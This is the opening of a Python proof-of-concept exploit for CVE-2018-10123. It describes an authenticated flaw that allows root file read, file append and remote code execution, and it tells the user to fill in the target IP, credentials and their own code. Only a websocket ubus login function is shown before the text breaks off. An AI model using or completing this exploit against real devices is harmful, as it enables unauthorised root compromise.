|
''' Any authenticated user can modify the configuration for it in a way which allows them to read and append to any file as root. This leads to information disclosure and remote code execution. This vulnerability has been assigned the CVE ID: CVE-2018-10123. This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution. ''' #!/usr/bin/python3 import json import sys import socket import os import time from websocket import create_connection def ubusAuth(host, username, password): ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"]) req = json.dumps({"jsonrpc":"2.0","method":"call", "params":["00000000000000000000000000000000","session","login", {"username": username,"password":password}], "id":666}) ws.send(req) response = json.loads(ws.recv()) ws.close() try: key = response.get('result')[1].get('ubus_rpc_session') except IndexError: return(None) return(key)
|
|
|